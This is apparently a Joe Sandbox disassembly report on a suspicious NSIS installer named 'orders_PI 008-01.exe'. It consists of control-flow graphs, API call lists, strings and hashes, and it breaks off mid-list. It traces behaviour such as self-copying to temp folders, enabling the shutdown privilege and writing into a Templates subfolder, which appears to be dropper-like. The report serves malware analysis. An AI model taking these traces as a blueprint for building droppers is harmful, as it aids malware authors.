3431->3435 3432->3435 3433 402fab 3434 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3434->3433 3435->3433 3435->3434 3446 6ff41058 3448 6ff41074 3446->3448 3447 6ff410dd 3448->3447 3449 6ff41092 3448->3449 3450 6ff41516 GlobalFree 3448->3450 3451 6ff41516 GlobalFree 3449->3451 3450->3449 3452 6ff410a2 3451->3452 3453 6ff410b2 3452->3453 3454 6ff410a9 GlobalSize 3452->3454 3455 6ff410b6 GlobalAlloc 3453->3455 3456 6ff410c7 3453->3456 3454->3453 3457 6ff4153d 3 API calls 3455->3457 3458 6ff410d2 GlobalFree 3456->3458 3457->3456 3458->3447 3421 6ff418d9 3422 6ff418fc 3421->3422 3423 6ff41931 GlobalFree 3422->3423 3424 6ff41943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 3422->3424 3423->3424 3425 6ff41272 2 API calls 
3424->3425 3426 6ff41ace GlobalFree GlobalFree 3425->3426 3469 6ff41000 3470 6ff4101b 5 API calls 3469->3470 3471 6ff41019 3470->3471 3387 6ff410e1 3388 6ff41111 3387->3388 3389 6ff411d8 GlobalFree 3388->3389 3390 6ff412ba 2 API calls 3388->3390 3391 6ff411d3 3388->3391 3392 6ff41164 GlobalAlloc 3388->3392 3393 6ff411f8 GlobalFree 3388->3393 3394 6ff41272 2 API calls 3388->3394 3395 6ff411c4 GlobalFree 3388->3395 3396 6ff412e1 lstrcpyW 3388->3396 3390->3388 3391->3389 3392->3388 3393->3388 3394->3395 3395->3388 3396->3388 3427 6ff42ca3 3428 6ff42cbb 3427->3428 3429 6ff4158f 2 API calls 3428->3429 3430 6ff42cd6 3429->3430 3436 6ff4166d 3442 6ff41516 3436->3442 3438 6ff416cb GlobalFree 3439 6ff41685 3439->3438 3440 6ff416a0 3439->3440 3441 6ff416b7 VirtualFree 3439->3441 3440->3438 3441->3438 3443 6ff4151c 3442->3443 3444 6ff41522 3443->3444 3445 6ff4152e GlobalFree 3443->3445 3444->3439 3445->3439 3383 6ff42349 3384 6ff423b3 3383->3384 3385 6ff423be GlobalAlloc 3384->3385 3386 6ff423dd 3384->3386 3385->3384

                                        Control-flow Graph

                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 004034C5
                                        • GetVersion.KERNEL32 ref: 004034CB
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                        • #17.COMCTL32(?,?,?,?), ref: 0040353B
                                        • OleInitialize.OLE32(00000000), ref: 00403542
                                        • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                        • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,?,?,?), ref: 00403573
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\orders_PI 008-01.exe",?,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?), ref: 004035AB
                                          • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
                                          • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,?,?,?), ref: 004036E5
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,?,?), ref: 004036F6
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,?,?), ref: 00403702
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,?,?), ref: 00403716
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,?,?), ref: 0040371E
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,?,?), ref: 0040372F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,?,?), ref: 00403737
                                        • DeleteFileW.KERNELBASE(1033,?,?,?,?), ref: 0040374B
                                          • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,?,?,?), ref: 004063FB
                                        • OleUninitialize.OLE32(?,?,?,?,?), ref: 00403816
                                        • ExitProcess.KERNEL32 ref: 00403837
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 0040384A
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 00403859
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 00403864
                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 00403870
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,?,?), ref: 0040388C
                                        • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?,?,?,?,?), ref: 004038E6
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\orders_PI 008-01.exe,0079F708,?,?,?,?,?), ref: 004038FA
                                        • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,?,?,?), ref: 00403927
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 00403956
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                        • ExitWindowsEx.USER32(?,80040002), ref: 004039BA
                                        • ExitProcess.KERNEL32 ref: 004039DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Foreningsprocessens$C:\Users\user\Desktop$C:\Users\user\Desktop\orders_PI 008-01.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                        • API String ID: 3441113951-1000259359
                                        • Opcode ID: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                        • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                        • Opcode Fuzzy Hash: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                        • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

                                        Control-flow Graph

                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                        • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?), ref: 00405B71
                                        • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?), ref: 00405B94
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?), ref: 00405B9A
                                        • FindFirstFileW.KERNELBASE(007A3F50,?,?,?,0040A014,?,007A3F50,?), ref: 00405BAA
                                        • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405C4A
                                        • FindClose.KERNEL32(00000000), ref: 00405C59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                        • API String ID: 2035342205-3776953501
                                        • Opcode ID: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                        • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                        • Opcode Fuzzy Hash: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                        • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 539 40324c-403263 540 403265 539->540 541 40326c-403275 539->541 540->541 542 403277 541->542 543 40327e-403283 541->543 542->543 544 403293-4032a0 call 403444 543->544 545 403285-40328e call 40345a 543->545 549 403432 544->549 550 4032a6-4032aa 544->550 545->544 551 403434-403435 549->551 552 4032b0-4032d6 GetTickCount 550->552 553 4033dd-4033df 550->553 556 40343d-403441 551->556 557 40343a 552->557 558 4032dc-4032e4 552->558 554 4033e1-4033e4 553->554 555 40341f-403422 553->555 554->557 561 4033e6 554->561 559 403424 555->559 560 403427-403430 call 403444 555->560 557->556 562 4032e6 558->562 563 4032e9-4032f7 call 403444 558->563 559->560 560->549 571 403437 560->571 565 4033e9-4033ef 561->565 562->563 563->549 573 4032fd-403306 563->573 568 4033f1 565->568 569 4033f3-403401 call 403444 565->569 568->569 569->549 576 403403-40340f call 405f96 569->576 571->557 575 40330c-40332c call 40693e 573->575 581 403332-403345 GetTickCount 575->581 582 4033d5-4033d7 575->582 585 403411-40341b 576->585 586 4033d9-4033db 576->586 583 403390-403392 581->583 584 403347-40334f 581->584 582->551 589 403394-403398 583->589 590 4033c9-4033cd 583->590 587 403351-403355 584->587 588 403357-403388 MulDiv wsprintfW call 405456 584->588 585->565 591 40341d 585->591 586->551 587->583 587->588 596 40338d 588->596 593 40339a-4033a1 call 405f96 589->593 594 4033af-4033ba 589->594 590->558 595 4033d3 590->595 591->557 599 4033a6-4033a8 593->599 598 4033bd-4033c1 594->598 595->557 596->583 598->575 600 4033c7 598->600 599->586 601 4033aa-4033ad 599->601 600->557 601->598
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                        • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                        • Opcode Fuzzy Hash: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                        • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,007A4F98,C:\,00405E14,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                        • FindClose.KERNEL32(00000000), ref: 00406763
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\
                                        • API String ID: 2295610775-3404278061
                                        • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                        • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                        • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                        • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 139 403e6b-403e7d 140 403e83-403e89 139->140 141 403fbe-403fcd 139->141 140->141 144 403e8f-403e98 140->144 142 40401c-404031 141->142 143 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 141->143 146 404071-404076 call 404390 142->146 147 404033-404036 142->147 143->142 148 403e9a-403ea7 SetWindowPos 144->148 149 403ead-403eb0 144->149 161 40407b-404096 146->161 153 404038-404043 call 401389 147->153 154 404069-40406b 147->154 148->149 150 403eb2-403ec4 ShowWindow 149->150 151 403eca-403ed0 149->151 150->151 156 403ed2-403ee7 DestroyWindow 151->156 157 403eec-403eef 151->157 153->154 176 404045-404064 SendMessageW 153->176 154->146 160 404311 154->160 162 4042ee-4042f4 156->162 165 403ef1-403efd SetWindowLongW 157->165 166 403f02-403f08 157->166 164 404313-40431a 160->164 168 404098-40409a call 40140b 161->168 169 40409f-4040a5 161->169 162->160 171 4042f6-4042fc 162->171 165->164 174 403fab-403fb9 call 4043ab 166->174 175 403f0e-403f1f GetDlgItem 166->175 168->169 172 4040ab-4040b6 169->172 173 4042cf-4042e8 DestroyWindow EndDialog 169->173 171->160 177 4042fe-404307 ShowWindow 171->177 172->173 178 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 172->178 173->162 174->164 179 403f21-403f38 SendMessageW IsWindowEnabled 175->179 180 403f3e-403f41 175->180 176->164 177->160 209 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 178->209 210 40410b-404110 178->210 179->160 179->180 183 403f43-403f44 180->183 184 403f46-403f49 180->184 187 403f74-403f79 call 40431d 183->187 188 403f57-403f5c 184->188 189 403f4b-403f51 184->189 187->174 192 403f92-403fa5 SendMessageW 188->192 194 403f5e-403f64 188->194 189->192 193 403f53-403f55 189->193 192->174 193->187 195 403f66-403f6c call 40140b 194->195 196 403f7b-403f84 call 40140b 194->196 205 403f72 195->205 196->174 206 403f86-403f90 196->206 205->187 206->205 213 404151-404152 209->213 214 404154 209->214 210->209 215 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404186-404197 SendMessageW 215->216 217 404199 215->217 218 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 216->218 217->218 218->161 229 4041e4-4041e6 218->229 229->161 230 4041ec-4041f0 229->230 231 4041f2-4041f8 230->231 232 40420f-404223 DestroyWindow 230->232 231->160 233 4041fe-404204 231->233 232->162 234 404229-404256 CreateDialogParamW 232->234 233->161 235 40420a 233->235 234->162 236 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 4042b5-4042c8 ShowWindow call 404390 236->241 243 4042cd 241->243 243->162
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?), ref: 00403EA7
                                        • ShowWindow.USER32(?), ref: 00403EC4
                                        • DestroyWindow.USER32 ref: 00403ED8
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                        • GetDlgItem.USER32(?,?), ref: 00403F15
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                        • GetDlgItem.USER32(?,?), ref: 00403FDE
                                        • GetDlgItem.USER32(?,?), ref: 00403FE8
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                        • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404053
                                        • GetDlgItem.USER32(?,?), ref: 004040F9
                                        • ShowWindow.USER32(00000000,?), ref: 0040411A
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                        • EnableWindow.USER32(?,?), ref: 00404147
                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415D
                                        • EnableMenuItem.USER32(00000000), ref: 00404164
                                        • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417C
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 0040418F
                                        • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                        • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                        • ShowWindow.USER32(?,?), ref: 00404301
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                        • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                        • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                        • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 244 403abd-403ad5 call 4067e3 247 403ad7-403ae7 call 406335 244->247 248 403ae9-403b20 call 4062bc 244->248 256 403b43-403b6c call 403d93 call 405dcb 247->256 252 403b22-403b33 call 4062bc 248->252 253 403b38-403b3e lstrcatW 248->253 252->253 253->256 262 403b72-403b77 256->262 263 403bfe-403c06 call 405dcb 256->263 262->263 264 403b7d-403ba5 call 4062bc 262->264 269 403c14-403c39 LoadImageW 263->269 270 403c08-403c0f call 40642b 263->270 264->263 274 403ba7-403bab 264->274 272 403cba-403cc2 call 40140b 269->272 273 403c3b-403c6b RegisterClassW 269->273 270->269 287 403cc4-403cc7 272->287 288 403ccc-403cd7 call 403d93 272->288 275 403c71-403cb5 SystemParametersInfoW CreateWindowExW 273->275 276 403d89 273->276 278 403bbd-403bc9 lstrlenW 274->278 279 403bad-403bba call 405cf0 274->279 275->272 281 403d8b-403d92 276->281 282 403bf1-403bf9 call 405cc3 call 4063ee 278->282 283 403bcb-403bd9 lstrcmpiW 278->283 279->278 282->263 283->282 286 403bdb-403be5 GetFileAttributesW 283->286 290 403be7-403be9 286->290 291 403beb-403bec call 405d0f 286->291 287->281 297 403d60-403d68 call 405529 288->297 298 403cdd-403cf7 ShowWindow call 406773 288->298 290->282 290->291 291->282 303 403d82-403d84 call 40140b 297->303 304 403d6a-403d70 297->304 305 403d03-403d15 GetClassInfoW 298->305 306 403cf9-403cfe call 406773 298->306 303->276 304->287 309 403d76-403d7d call 40140b 304->309 307 403d17-403d27 GetClassInfoW RegisterClassW 305->307 308 403d2d-403d50 DialogBoxParamW call 40140b 305->308 306->305 307->308 314 403d55-403d5e call 403a0d 308->314 309->287 314->281
                                        APIs
                                          • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
                                          • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                        • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000), ref: 00403B3E
                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,?,75573420), ref: 00403BBE
                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                        • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods), ref: 00403C25
                                          • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                        • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                        • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C7A
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                        • ShowWindow.USER32(?,00000000), ref: 00403CE5
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                        • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                        • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                        • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
